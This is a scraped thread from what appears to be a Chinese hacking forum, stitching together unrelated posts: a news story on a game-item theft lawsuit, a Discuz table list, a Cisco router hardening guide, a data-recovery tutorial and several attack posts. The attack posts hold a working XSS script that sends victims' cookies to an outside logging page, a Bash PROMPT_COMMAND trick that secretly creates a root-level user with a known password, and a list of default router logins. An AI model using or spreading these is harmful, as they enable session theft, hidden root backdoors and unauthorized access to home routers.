返回列表 发帖

黑客偷走虚拟“复活戒指” 玩家告网游公司

网络玩家因为一枚虚拟的“复活戒指”丢失,将网络公司告上法院,要求对方归还。网络侵权纠纷,以前没有法律规范直接适用,而今年7月1日施行的《侵权责任法》对网络侵权责任进行了明确规范。昨天,靖江法院首次用该法审结该案,要求被告返还“复活戒指”。    玩家:还我“复活戒指”
    今年35岁的黄浩一直是上海盛大网络有限公司(下称盛大公司)《热血传奇》的玩家,游戏中的角色名为“将敬酒”。2009年1月12日,他和往 常一样进入游戏二区,却发现自己游戏账号内复活戒指、王者之剑、通云道戒等11种游戏装备丢失,即向警方报案,靖江市公安局初步查证认为,游戏装备丢失可 能受远程木马操控。
    根据靖江警方的要求,盛大公司至2009年1月24日,已返还黄浩除“复活戒指”以外的其他游戏装备。“复活戒指”价值10000元,是自己的合法财产,怎可不返还呢?黄浩在跟盛大公司多次交涉未果后,今年4月将其告上法庭。
    网络公司:返还?不可能
    接到靖江法院送达的起诉材料后,盛大公司向法庭寄来材料称,2009年1月,他们根据靖江警方的要求,将已在新疆玩家“冰儿”手上的那枚“复活 戒指”冻结,结果“冰儿”将他们告上法庭。“冰儿”称,“复活戒指”是她在《热血传奇》游戏中,通过与“将敬酒”PK取得,他们不能无理冻结。法院审理 中,由于他们没能提供证据证明“冰儿”取得“复活戒指”的行为是恶意的或是远程木马盗取的,也无法证明“冰儿”的行为违反网络游戏的正常规则。
    结果,新疆当地法院判决他们将 “复活戒指”返还给“冰儿”,所以,再返还给黄浩已不可能。
    法院:网络公司构成侵权
    靖江法院审理后认为,我国侵权责任法第36条第3款规定,网络服务提供者知道网络用户利用网络服务侵害他人民事权益,在接到通知后而怠于采取必 要措施的,对损害的扩大部分依法应当与侵权用户承担连带责任。新疆当地法院审理玩家“冰儿”要求被告返还关于与原告PK取得本案“复活戒指”的诉讼过程 中,被告作为网络服务提供者怠于采取必要措施,既未提供本案原告与“冰儿”PK有关讼争“复活戒指”的游戏数据记录,又未告知本案原告有关诉讼情况,致使 原告丧失了讼争的装备,侵害了原告财产权利。
    因此,靖江法院最终认定,原告要求被告返还“复活戒指”的诉讼请求符合法律规定,予以支持。

 

您可能还想看的主题:

盗售网游银两 黑客获利300万

我第一次接触黑客

美国企业家称黑客文化可推动世界走向繁荣

linux安全网高级黑客视频教程【1.2GB】

我的第一次

服务器如何防范webshell!

foosun最新SQL注入漏洞爆管理员帐号密码

2008中国黑客组织与人物X档案

关于网上对非安全中国网团队不实信息是污蔑!

社会工程学攻击搞定过份自信的CEO

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:小一发表,本帖发表者小一符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者小一和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

discuz论坛数据表结构说明[br]cdb_access               用户权限表      [BR]cdb_adminactions         管理动作表[BR]cdb_admingroups           管理组数据表[BR]cdb_adminnotes           管理员留言  [BR]cdb_adminsessions         管理员后台在线记录[BR]cdb_advertisements       广告资料表[BR]cdb_announcements         论坛公告资料表[BR]cdb_attachments           附件资料表[BR]cdb_attachtypes           附件类型表[BR]cdb_banned               被禁止的ip列表[BR]cdb_bbcodes               bb代码资料表[BR]cdb_blogcaches           博客缓存表[BR]cdb_buddys               好友信息表[BR]cdb_creditslog           积分交易记录表[BR]cdb_crons                 计划任务表[BR]cdb_failedlogins         错误登录记录[BR]cdb_favorites             个人收藏信息表[BR]cdb_forumfields           板块扩展信息数据表[BR]cdb_forumlinks           友情链接数据表[BR]cdb_forums               版块资料表[BR]cdb_medals               勋章资料表[BR]cdb_memberfields         用户扩展资料表[BR]cdb_members               用户基本资料表[BR]cdb_moderators           版主信息数据表[BR]cdb_modworks             版主工作记录表[BR]cdb_onlinelist           在线列表定制[BR]cdb_onlinetime           用户在线时间信息表[BR]cdb_orders               订单数据表[BR]cdb_paymentlog           支付记录[BR]cdb_pluginhooks           插件钩子表[BR]cdb_plugins               插件表[BR]cdb_pluginvars           插件配置表[BR]cdb_pms                   短信资料表[BR]cdb_pmsearchindex         短消息搜索缓存表[BR]cdb_polls                 投票帖资料表[BR]cdb_posts                 帖子资料表[BR]cdb_profilefields         用户栏目定制[BR]cdb_promotions           论坛推广[BR]cdb_ranks                 头衔表[BR]cdb_ratelog               帖子评分记录表[BR]cdb_regips               注册ip记录表[BR]cdb_relatedthreads       相关主题[BR]cdb_rsscaches             RSS缓存[BR]cdb_searchindex           搜索缓存[BR]cdb_sessions             在线表[BR]cdb_settings             论坛设置表[BR]cdb_smilies               表情信息表[BR]cdb_stats               统计数据表[BR]cdb_statvars             统计变量表[BR]cdb_styles               风格[BR]cdb_stylevars             风格变量表[BR]cdb_subscrīptions         订阅信息表[BR]cdb_templates             模板[BR]cdb_threads               主题资料表[BR]cdb_threadsmod           主题管理记录表[BR]cdb_threadtypes           主题分类表        [BR]cdb_usergroups           用户组数据表[BR]cdb_validating           等待人工审核的会员记录[BR]cdb_words                 词语过滤表


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

盗取网站Cookies的源代码
<TABLE class="tab-content table-break" cellSpacing=0 cellPadding=0>



偷取Cookies源代码


偷取Cookie,通过以下脚本引入一个js,document.write("<script src=XX.js></script>"),然后js内容为: var code;          var target = "http://www.xxx.net/cookie.asp?"; info=escape(document.location+"@@@"+document.cookie); target=target+info; code="<iframe style='display:none;' src="; code=code+target;          code=code+" width=0 height=0></iframe>"; document.write(code); 这样就可以将cookie等信息传到我们的站点了!cookie.asp内容为: dim fso,file,str         str=unescape(request.Servervariables("QUERY_STRING"))     Const ForReading = 1, ForWriting = 2, ForAppending = 8 Set fso = Server.CreateObject("Scripting.FileSystemObject")  path = server.mappath("xxx.txt")      set file=fso.opentextfile(path, ForAppending, TRUE)    file.write("Xss:") file.write(str)         file.write vbCrLf        file.close set file = nothing         set fso = nothing </TABLE>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Cisco路由器的安全配置简易方案
一,路由器访问控制的安全配置1,严格控制可以访问路由器的管理员。任何一次维护都需要记录备案。2,建议不要远程访问路由器。即使需要远程访问路由器,建议使用访问控制列表和高强度的密码控制。3,严格控制CON端口的访问。具体的措施有:A,如果可以开机箱的,则可以切断与CON口互联的物理线路。B,可以改变默认的连接属性,例如修改波特率(默认是96000,可以改为其他的)。C,配合使用访问控制列表控制对CON口的访问。如:Router(Config)#Access-list 1 permit 192.168.0.1    Router(Config)#line con 0    Router(Config-line)#Transport input none    Router(Config-line)#Login local    Router(Config-line)#Exec-timeoute 5 0    Router(Config-line)#access-class 1 in    Router(Config-line)#endD,给CON口设置高强度的密码。4,如果不使用AUX端口,则禁止这个端口。默认是未被启用。禁止如:  Router(Config)#line aux 0  Router(Config-line)#transport input none  Router(Config-line)#no exec5,建议采用权限分级策略。如:Router(Config)#username BluShin privilege 10 G00dPa55w0rdRouter(Config)#privilege EXEC level 10 telnetRouter(Config)#privilege EXEC level 10 show ip access-list6,为特权模式的进入设置强壮的密码。不要采用enable password设置密码。而要采用enable secret命令设置。并且要启用Service password-encryption。7,控制对VTY的访问。如果不需要远程访问则禁止它。如果需要则一定要设置强壮的密码。由于VTY在网络的传输过程中为加密,所以需要对其进行严格的控制。如:设置强壮的密码;控制连接的并发数目;采用访问列表严格控制访问的地址;可以采用AAA设置用户的访问控制等。8,IOS的升级和备份,以及配置文件的备份建议使用FTP代替TFTP。如:Router(Config)#ip ftp username BluShinRouter(Config)#ip ftp password 4tppa55w0rdRouter#copy startup-config ftp:9,及时的升级和修补IOS软件。二,路由器网络服务安全配置1,禁止CDP(Cisco Discovery Protocol)。如:  Router(Config)#no cdp run   Router(Config-if)# no cdp enable2,禁止其他的TCP、UDP Small服务。  Router(Config)# no service tcp-small-servers  Router(Config)# no service udp-samll-servers3,禁止Finger服务。  Router(Config)# no ip finger  Router(Config)# no service finger4,建议禁止HTTP服务。  Router(Config)# no ip http server 如果启用了HTTP服务则需要对其进行安全配置:设置用户名和密码;采用访问列表进行控制。如:Router(Config)# username BluShin privilege 10 G00dPa55w0rd Router(Config)# ip http auth local Router(Config)# no access-list 10Router(Config)# access-list 10 permit 192.168.0.1 Router(Config)# access-list 10 deny any Router(Config)# ip http access-class 10 Router(Config)# ip http serverRouter(Config)# exit 5,禁止BOOTp服务。  Router(Config)# no ip bootp server禁止从网络启动和自动从网络下载初始配置文件。  Router(Config)# no boot network  Router(Config)# no servic config6,禁止IP Source Routing。  Router(Config)# no ip source-route7,建议如果不需要ARP-Proxy服务则禁止它,路由器默认识开启的。  Router(Config)# no ip proxy-arp  Router(Config-if)# no ip proxy-arp8,明确的禁止IP Directed Broadcast。  Router(Config)# no ip directed-broadcast9,禁止IP Classless。  Router(Config)# no ip classless10,禁止ICMP协议的IP Unreachables,Redirects,Mask Replies。  Router(Config-if)# no ip unreacheables  Router(Config-if)# no ip redirects  Router(Config-if)# no ip mask-reply11,建议禁止SNMP协议服务。在禁止时必须删除一些SNMP服务的默认配置。或者需要访问列表来过滤。如:  Router(Config)# no snmp-server community public Ro  Router(Config)# no snmp-server community admin RW  Router(Config)# no access-list 70  Router(Config)# access-list 70 deny any  Router(Config)# snmp-server community MoreHardPublic Ro 70  Router(Config)# no snmp-server enable traps  Router(Config)# no snmp-server system-shutdown  Router(Config)# no snmp-server trap-anth  Router(Config)# no snmp-server  Router(Config)# end12,如果没必要则禁止WINS和DNS服务。  Router(Config)# no ip domain-lookup  如果需要则需要配置:  Router(Config)# hostname Router  Router(Config)# ip name-server 202.102.134.9613,明确禁止不使用的端口。  Router(Config)# interface eth0/3  Router(Config)# shutdown三,路由器路由协议安全配置1,首先禁止默认启用的ARP-Proxy,它容易引起路由表的混乱。Router(Config)# no ip proxy-arp 或者Router(Config-if)# no ip proxy-arp2,启用OSPF路由协议的认证。默认的OSPF认证密码是明文传输的,建议启用MD5认证。并设置一定强度密钥(key,相对的路由器必须有相同的Key)。  Router(Config)# router ospf 100Router(Config-router)# network 192.168.100.0 0.0.0.255 area 100! 启用MD5认证。! area area-id authentication 启用认证,是明文密码认证。!area area-id authentication message-digestRouter(Config-router)# area 100 authentication message-digestRouter(Config)# exitRouter(Config)# interface eth0/1!启用MD5密钥Key为routerospfkey。!ip ospf authentication-key key 启用认证密钥,但会是明文传输。!ip ospf message-digest-key key-id(1-255) md5 keyRouter(Config-if)# ip ospf message-digest-key 1 md5 routerospfkey3,RIP协议的认证。只有RIP-V2支持,RIP-1不支持。建议启用RIP-V2。并且采用MD5认证。普通认证同样是明文传输的。Router(Config)# config terminal! 启用设置密钥链Router(Config)# key chain mykeychainnameRouter(Config-keychain)# key 1!设置密钥字串Router(Config-leychain-key)# key-string MyFirstKeyStringRouter(Config-keyschain)# key 2Router(Config-keychain-key)# key-string MySecondKeyString!启用RIP-V2Router(Config)# router ripRouter(Config-router)# version 2Router(Config-router)# network 192.168.100.0Router(Config)# interface eth0/1! 采用MD5模式认证,并选择已配置的密钥链Router(Config-if)# ip rip authentication mode md5Router(Config-if)# ip rip anthentication key-chain mykeychainname4,启用passive-interface命令可以禁用一些不需要接收和转发路由信息的端口。建议对于不需要路由的端口,启用passive-interface。但是,在RIP协议是只是禁止转发路由信息,并没有禁止接收。在OSPF协议中是禁止转发和接收路由信息。! Rip中,禁止端口0/3转发路由信息Router(Config)# router RipRouter(Config-router)# passive-interface eth0/3 !OSPF中,禁止端口0/3接收和转发路由信息Router(Config)# router ospf 100Router(Config-router)# passive-interface eth0/35,启用访问列表过滤一些垃圾和恶意路由信息,控制网络的垃圾信息流。Router(Config)# access-list 10 deny 192.168.1.0 0.0.0.255Router(Config)# access-list 10 permit any ! 禁止路由器接收更新192.168.1.0网络的路由信息Router(Config)# router ospf 100Router(Config-router)# distribute-list 10 in!禁止路由器转发传播192.168.1.0网络的路由信息Router(Config)# router ospf 100Router(Config-router)# distribute-list 10 out6,建议启用IP Unicast Reverse-Path Verification。它能够检查源IP地址的准确性,从而可以防止一定的IP Spooling。但是它只能在启用CEF(Cisco Express Forwarding)的路由器上使用。Router# config t! 启用CEFRouter(Config)# ip cef!启用Unicast Reverse-Path VerificationRouter(Config)# interface eth0/1Router(Config)# ip verify unicast reverse-path 四,路由器审核安全配置五,路由器其他安全配置1,及时的升级IOS软件,并且要迅速的为IOS安装补丁。2,要严格认真的为IOS作安全备份。3,要为路由器的配置文件作安全备份。4,购买UPS设备,或者至少要有冗余电源。5,要有完备的路由器的安全访问和维护记录日志。6,要严格设置登录Banner。必须包含非授权用户禁止登录的字样。7,IP欺骗得简单防护。如过滤非公有地址访问内部网络。过滤自己内部网络地址;回环地址(127.0.0.0/8);RFC1918私有地址;DHCP自定义地址(169.254.0.0/16);科学文档作者测试用地址(192.0.2.0/24);不用的组播地址(224.0.0.0/4);SUN公司的古老的测试地址(20.20.20.0/24;204.152.64.0/23);全网络地址(0.0.0.0/8)。Router(Config)# access-list 100 deny ip 192.168.0.0 0.0.0.255 any logRouter(Config)# access-list 100 deny ip 127.0.0.0 0.255.255.255 any log Router(Config)# access-list 100 deny ip 192.168.0.0 0.0.255.255 any logRouter(Config)# access-list 100 deny ip 172.16.0.0 0.15.255.255 any logRouter(Config)# access-list 100 deny ip 10.0.0.0 0.255.255.255 any logRouter(Config)# access-list 100 deny ip 169.254.0.0 0.0.255.255 any logRouter(Config)# access-list 100 deny ip 192.0.2.0 0.0.0.255 any logRouter(Config)# access-list 100 deny ip 224.0.0.0 15.255.255.255 any Router(Config)# access-list 100 deny ip 20.20.20.0 0.0.0.255 any logRouter(Config)# access-list 100 deny ip 204.152.64.0 0.0.2.255 any logRouter(Config)# access-list 100 deny ip 0.0.0.0 0.255.255.255 any log8,建议采用访问列表控制流出内部网络的地址必须是属于内部网络的。如:Router(Config)# no access-list 101Router(Config)# access-list 101 permit ip 192.168.0.0 0.0.0.255 anyRouter(Config)# access-list 101 deny ip any any logRouter(Config)# interface eth 0/1Router(Config-if)# description “internet Ethernet”Router(Config-if)# ip address 192.168.0.254 255.255.255.0Router(Config-if)# ip access-group 101 in9,TCP SYN的防范。如:A: 通过访问列表防范。Router(Config)# no access-list 106 Router(Config)# access-list 106 permit tcp any 192.168.0.0 0.0.0.255 establishedRouter(Config)# access-list 106 deny ip any any logRouter(Config)# interface eth 0/2Router(Config-if)# description “external Ethernet”Router(Config-if)# ip address 192.168.1.254 255.255.255.0Router(Config-if)# ip access-group 106 inB:通过TCP截获防范。(这会给路由器产生一定负载)Router(Config)# ip tcp intercept list 107Router(Config)# access-list 107 permit tcp any 192.168.0.0 0.0.0.255Router(Config)# access-list 107 deny ip any any logRouter(Config)# interface eth0Router(Config)# ip access-group 107 in10,LAND.C 进攻的防范。Router(Config)# access-list 107 deny ip host 192.168.1.254 host 192.168.1.254 logRouter(Config)# access-list permit ip any anyRouter(Config)# interface eth 0/2Router(Config-if)# ip address 192.168.1.254 255.255.255.0Router(Config-if)# ip access-group 107 in11,Smurf进攻的防范。Router(Config)# access-list 108 deny ip any host 192.168.1.255 logRouter(Config)# access-list 108 deny ip any host 192.168.1.0 log12,ICMP协议的安全配置。对于进入ICMP流,我们要禁止ICMP协议的ECHO、Redirect、Mask request。也需要禁止TraceRoute命令的探测。对于流出的ICMP流,我们可以允许ECHO、Parameter Problem、Packet too big。还有TraceRoute命令的使用。! outbound ICMP ControlRouter(Config)# access-list 110 deny icmp any any echo logRouter(Config)# access-list 110 deny icmp any any redirect logRouter(Config)# access-list 110 deny icmp any any mask-request logRouter(Config)# access-list 110 permit icmp any any ! Inbound ICMP ControlRouter(Config)# access-list 111 permit icmp any any echoRouter(Config)# access-list 111 permit icmp any any Parameter-problemRouter(Config)# access-list 111 permit icmp any any packet-too-bigRouter(Config)# access-list 111 permit icmp any any source-quenchRouter(Config)# access-list 111 deny icmp any any log! Outbound TraceRoute ControlRouter(Config)# access-list 112 deny udp any any range 33400 34400 ! Inbound TraceRoute ControlRouter(Config)# access-list 112 permit udp any any range 33400 34400 13,DDoS(Distributed Denial of Service)的防范。! The TRINOO DDoS systemRouter(Config)# access-list 113 deny tcp any any eq 27665 logRouter(Config)# access-list 113 deny udp any any eq 31335 logRouter(Config)# access-list 113 deny udp any any eq 27444 log! The Stacheldtraht DDoS system Router(Config)# access-list 113 deny tcp any any eq 16660 logRouter(Config)# access-list 113 deny tcp any any eq 65000 log! The TrinityV3 SystemRouter(Config)# access-list 113 deny tcp any any eq 33270 logRouter(Config)# access-list 113 deny tcp any any eq 39168 log! The SubSeven DDoS system and some VariantsRouter(Config)# access-list 113 deny tcp any any range 6711 6712 logRouter(Config)# access-list 113 deny tcp any any eq 6776 logRouter(Config)# access-list 113 deny tcp any any eq 6669 logRouter(Config)# access-list 113 deny tcp any any eq 2222 logRouter(Config)# access-list 113 deny tcp any any eq 7000 log13,建议启用SSH,废弃掉Telnet。但只有支持并带有IPSec特征集的IOS才支持SSH。并且IOS12.0-IOS12.2仅支持SSH-V1。如下配置SSH服务的例子:Router(Config)# config tRouter(Config)# no access-list 22Router(Config)# access-list 22 permit 192.168.0.22Router(Config)# access-list deny anyRouter(Config)# username BluShin privilege 10 G00dPa55w0rd! 设置SSH的超时间隔和尝试登录次数Router(Config)# ip ssh timeout 90Router(Config)# ip ssh anthentication-retries 2Router(Config)# line vty 0 4Router(Config-line)# access-class 22 inRouter(Config-line)# transport input sshRouter(Config-line)# login localRouter(Config-line)# exit!启用SSH服务,生成RSA密钥对。Router(Config)# crypto key generate rsaThe name for the keys will be: router.blushin.orgChoose the size of the key modulus in the range of 360 to 2048 for your General Purpose Keys .Choosing a key modulus greater than 512 may take a few minutes. How many bits in the modulus[512]: 2048 Generating RSA Keys... [OK] Router(Config)#


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

顶顶更健康,越顶吃的越香。


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

轻松恢复被删除的文件
<p style="margin:0cm 0cm 0pt;text-align:center;" align="center">轻松恢复被删除的文件[/quote]
<p style="margin:0cm 0cm 0pt;">嘿嘿!是不是有有的朋友经常误删文件而常常又自认倒霉呢?嘿嘿今天我就让大家即使是误删也不怕嘿嘿,废话少说。看我操作。

[/quote]
<p style="margin:0cm 0cm 0pt;">[/quote]
<p style="margin:0cm 0cm 0pt;">第一:使用方法[/quote]
<p style="margin:0cm 0cm 0pt;">这个就是我们今天的主角可谓是三剑客[/quote]
<p style="margin:0cm 0cm 0pt;">1.Digital MediaRescue Pro 能够将你的数码设备上的视频数据、音频数据进行恢复的工具,包括硬盘数据、闪存卡、MP3、WMA、PDAs、手机、MMCs卡、SD卡等里的数据。并能储存和添加其他文件格式包括:JPEG, AVI, MOV,MP3, WMA, WAV等。[/quote]
<p style="margin:0cm 0cm 0pt;">2.Office DocumentsRescue Professional可以将丢失的DOC、XLS、PPT、RTF、LIT等文件类型的数据 从硬盘、CF卡(包括I、II型)、IBM微盘、SM卡、多媒体卡(MMCs)、SD卡、记忆棒以及其他存储介质上予以恢复。[/quote]
<p style="margin:0cm 0cm 0pt;">3.Digital PhotoRescue Pro 是一款专业的数码图片恢复工具,能从硬盘、CF卡、IBM Microdrives 、MMC、SD、mp3player、PDA等闪存卡里恢复被误删、误格、损坏的文件。支持*.jpg .gif .crw .bmp .tiff  .mpg .png 等格式的图象文件。
我已经给大家把软件绿色化了无插件无病毒。[/quote]
<p style="margin:0cm 0cm 0pt;">这里我就拿其中一个做演示,其余几个操作都大同小异。[/quote]
<p style="margin:0cm 0cm 0pt;">我就用Digital PhotoRescue Pro 来为大家演示如何恢复因为操作失误而导致误删除的相片。嘿嘿………
首先进入文件夹打开,这个像救生圈图标的程序。

[/quote]
<p style="margin:0cm 0cm 0pt;">[/quote]
<p style="margin:0cm 0cm 0pt;">然后;我们进入下一步“选择语言”选择第一个“Chinese”

[/quote]
<p style="margin:0cm 0cm 0pt;">[/quote]
<p style="margin:0cm 0cm 0pt;">然后;我们就来到了向导的界面,跟着指引我们就可以完成我们的数据恢复了^_^![/quote]
<p style="margin:0cm 0cm 0pt;">[/quote]
<p style="margin:0cm 0cm 0pt;">[/quote]
<p style="margin:0cm 0cm 0pt;">第二:实战[/quote]
<p style="margin:0cm 0cm 0pt;">使用方法我已经给大家说明了,现在我们来进行实战。[/quote]
<p style="margin:0cm 0cm 0pt;">我这里已经准备好了十几张图片。

[/quote]
<p style="margin:0cm 0cm 0pt;">我们现在把他删除掉….嘿嘿

[/quote]
<p style="margin:0cm 0cm 0pt;">[/quote]
<p style="margin:0cm 0cm 0pt;">现在我们来运行Digital PhotoRescue Pro

[/quote]
<p style="margin:0cm 0cm 0pt;">[/quote]
<p style="margin:0cm 0cm 0pt;">来到“选择驱动器符”因为我们是在桌面上面做的测试所以我们选择C盘。

[/quote]
<p style="margin:0cm 0cm 0pt;">[/quote]
<p style="margin:0cm 0cm 0pt;">这里“选择需要恢复的文件类型”因为是图片所以没有必要选择其他的我们直接选择图片格式即可。

[/quote]
<p style="margin:0cm 0cm 0pt;">[/quote]
<p style="margin:0cm 0cm 0pt;">这里给大家说下,该恢复软件还携带恢复指定文件。如果大家需要恢复指定文件就把“文件名称”这里打钩在输入需要恢复的文件即可。

[/quote]
<p style="margin:0cm 0cm 0pt;">[/quote]
<p style="margin:0cm 0cm 0pt;">这里建议大家选择“恢复已经删除的文件”,千万别选择下面一个因为这个是会很慢,很浪费我们的时间。我们继续前进……..

[/quote]
<p style="margin:0cm 0cm 0pt;">[/quote]
<p style="margin:0cm 0cm 0pt;">这里选择保存路径。[/quote]
<p style="margin:0cm 0cm 0pt;">(注意:恢复出来的文件,千万别放到需要恢复的盘符里面;不然数据可以被覆盖掉,那我们的数据就没救了。)[/quote]
<p style="margin:0cm 0cm 0pt;">我们继续前进,开始恢复。速度不错吧!嘿嘿~~

[/quote]
<p style="margin:0cm 0cm 0pt;">[/quote]
<p style="margin:0cm 0cm 0pt;">这里我们看看有没有找到我们需要的数据,如果没有继续“前进”进行深度扫描…

[/quote]
<p style="margin:0cm 0cm 0pt;">[/quote]
<p style="margin:0cm 0cm 0pt;">如果找到了我们就开始恢复。

[/quote]
<p style="margin:0cm 0cm 0pt;">[/quote]
<p style="margin:0cm 0cm 0pt;">速度比较快……..[/quote]
<p style="margin:0cm 0cm 0pt;">[/quote]
<p style="margin:0cm 0cm 0pt;">我们在来看看我们的数据是否被恢复..

[/quote]
<p style="margin:0cm 0cm 0pt;">[/quote]
<p style="margin:0cm 0cm 0pt;">因为是恢复整个C盘的所以还有其他文件并且保存了文件结构。[/quote]
<p style="margin:0cm 0cm 0pt;">嘿嘿!不错吧….好了就讲到这里.其余两个方法大同小异就不演示了。[/quote]
<p style="margin:0cm 0cm 0pt;">特别注意:当数据丢失的时候请勿向数据丢失的那个盘符存放任何数据保护好现场,这样才能进行有效数据恢复。如果无法找到数据请找专业人员进行恢复,很多网友会很惊异,网络上有那么多的恢复软件,但为什么还有那么多的数据恢复公司存在?答案其实很简单,专门的数据恢复公司,是通过专业的硬件设备,加上针对性的恢复软件,再加上经验老到的数据恢复工程师,多管齐下,才能将丢失的数据恢复出来的。在磁头或盘体坏了的情况下,也可以通过打开硬盘把盘体的内容读出来,这绝对是一个耗时又耗力的活儿,而不是简单的数据恢复软件所能比拟的。[/quote]



















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

利用BASH提权
要利用成功的话,还得看管理员的习惯,这个技巧要比

看个BASH的环境变量

$PROMPT_COMMAND

这个变量保存了在主提示符$PS1显示之前需要执行的命令.

export PROMPT_COMMAND="/usr/sbin/useradd -o -u 0 kkoo &amp;>/dev/null &amp;&amp; echo kkoo:123456 | /usr/sbin/chpasswd &amp;>/dev/null &amp;&amp; unset PROMPT_COMMAND"
随后你用su变成root,看看是否多了个用户呢
var im_d0a7aa84be1ce2b17729b900953bb02b = "";


也可以建立用户删除不了的文件比如,用户想删除某个,你在prompt_command里面加入cp命令,每次他执行完del都会又cp一个过去

具体怎么应用看你自己了


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

宽带路由猫的默认密码列表
艾玛 701g 192.168.101.1 192.168.0.1 用户名:admin 密码:admin 用户名:SZIM 密码:SZIM
艾玛701H 192.168.1.1 10.0.0.2 用户名:admin 密码:epicrouter
实达2110EH ROUTER 192.168.10.1 用户名:user 密码:password 用户名:root 密码:grouter
神州数码/华硕: 用户名:adsl 密码:adsl1234 全向: 用户名:root 密码:root
普天: 用户名:admin 密码:dare
e-tek 用户名:admin 密码:12345
zyxel 用户名:anonymous 密码:1234
北电 用户名:anonymous 密码:12345
大恒 用户名:admin 密码:admin
大唐 用户名:admin 密码:1234
斯威特 用户名:root 密码:root 用户名:user 密码:user 中兴 用户名:adsl 密码:adsl831
1、全向QL1680 IP地址10.0.0.2,用户名:admin,密码:qxcomm1680, 管理员密码:qxcommsupport。 全向QL1880 IP地址192.168.1.1,用户名:root,密码:root 全向QL1688 IP地址10.0.0.2,用户名为admin;密码为qxcomm1688 2、TP-LINK TD-8800在IE输入192.168.1.1,户名admin,密码admin 3、合勤zyxel 642 在运行输入telnet 192.168.1.1 密码1234 4、Ecom ED-802EG 在IE输入192.168.1.1,用户名和密码都为root 5、神州数码6010RA,在IE输入192.168.1.1 用户名为ADSL,密码为ADSL1234 6、华为SmartAX MT800的初始IP是192.168.1.1,用户名和密码都为ADMIN,恢复默认配置的方法有两种,
一种是连续按MODEM背后的RESET键三次,另一种是在配置菜单的SAVE&amp;REBOOT里选择恢复默认配置。 7、伊泰克:IP:192.168.1.1 用户名:supervisor 密码:12345 8、华硕IP:192.168.1.1 用户名:adsl 密码:adsl1234 9、阿尔卡特 192.168.1.1 一般没有密码 10、同维DSL699E 192.168.1.1 用户名:ROOT 密码:ROOT 11、大亚DB102 192.168.1.1 用户名:admin 密码:dare 高级设置://192.168.1.1/doc/index1.htm 12、WST的RT1080 192.168.0.1 username:root password:root
13、WST的ART18CX 10.0.0.2 username:admin password:conexant username:user password:password 14、实达V3.2 root root V5.4 root grouter 15、泛德 admin conexant 16、东信Ea700 192.168.1.1用户名:空 密码:password 17、broadmax的hsa300a 192.168.0.1 username:broadmax password:broadmax 18、长虹ch-500E 192.168.1.1 username:root password:root 19、重庆普天CP ADSL03 192.168.1.1 username:root password:root 20、台湾突破EA110 RS232:38400 192.168.7.1 usernameSL pswSL 21、etek-td的ADSL_T07L006.0 192.168.1.1 User Name: supervisor Password: 12345 忘记密码的解决办法: 使用超级终端的Xmodem方式重写Vxworks.dlf,密码恢复成:
12345 22、GVC的DSL-802E/R3A 10.0.0.2 username:admin password:epicrouter username:user
password:password 23、科迈易通km300A-1 192.168.1.1 username: password:password 科迈易通km300A-G 192.168.1.1
username:root password:root 科迈易通km300A-A 192.168.1.1 username:root or admin
password:123456 24、sunrise的SR-DSL-AE 192.168.1.1 username:admin password:0000 sunrise的DSL-802E_R3A
10.0.0.2 username:admin password:epicrouter username:user password:password
25、UTStar的ut-300R 192.168.1.1 username:root or admin password:utstar 这些都是一些ADSL设奋
的出厂时的默认初始IP,用户名和密码,是要调试这些设奋时必须要知道的东西。 一般调试这些设奋有
三种方法,一种是最常见的WEB方法,就是在浏览器中填入设奋的IP,如QX1680,就是在浏览器地址栏输
入10.0.0.2,出现提示栏后,输入用户名admin,密码qxcommsupport,就可以管理员设置界面了。最常见
和最简单的就是这种方法。 第二种方法就是用TELNET的方法,telnet IP,如早期的合勤642,方法telnet  
192.168.1.1,然后输入密码1234,就可以进入全英文的字符界面了。 第三种方法就是用厂商自带的配置程
序来进入配置界面,如CyberLink 6307/6309KG 它使用在随Cybrlink 6307/6309KG带的光盘中DSLCom.exe
, 出厂时默认值:路由IP地址 :1 92.168.1.1密码 : stm,由于这种方法没有前两种方法方便,所以现
在的低端产品比较少采用了。 绝大部分产品的调试都是要先通过产品自带的双绞线连接设奋后,把本机
网卡的IP设置成跟该设奋同一网段,再进行配置,如设奋被改了默认的IP或者密码,大部分都可以通过复
位来恢复出厂默认值。最常用也是最有用的方法就是把设奋断电后,一直按住复位键,然后通电,持续一
小段时间后就可以恢中达通CT-500 192.168.1.1 root/12345 26.中兴adsl841默认IP:192.168.1.1,UserName:admin,Password:private
成都天逸 用户名:admin 密码:epicrouter
上海中达 用户名:(随意) 密码:12345
各位用ADSL的朋友,在拿到ADSL猫后,应及时修改默认密码,以免被人所利用
ADSL MODEM初始地址及用户名密码大全 要调试这些设奋,要先把网卡的IP地址设置成跟这些ADSL设奋相同的网段 1、全向QL1680在IE浏览器的地址栏里面敲入IP地址10.0.0.2,的用户名是admin出厂时默认值:密码是
qxcomm1680,管理员密码是 qxcommsupport 2、全向QL1880在IE浏览器的地址栏里面敲入IP地址192.168.1.1,的用户名是root出厂时默认值:密码是
root 3、全向QL1688在IE浏览器的地址栏里面敲入IP地址10.0.0.2,用户名为admin;出厂时默认值:密码为
qxcomm1688 4、CyberLink 6307/6309KG 它使用在随Cyberlink6307/6309KG带的光盘中DSLCom.exe, 出厂时默认值:
路由IP地址 : 192.168.1.1密码 : stm 5、TP-LINK TD-8800在IE输入192.168.1.1,户名admin,密码admin. 6、合勤zyxel 642 在运行输入telnet 192.168.1.1 密码1234,一直按住机身后面的的RESET复位键然后开
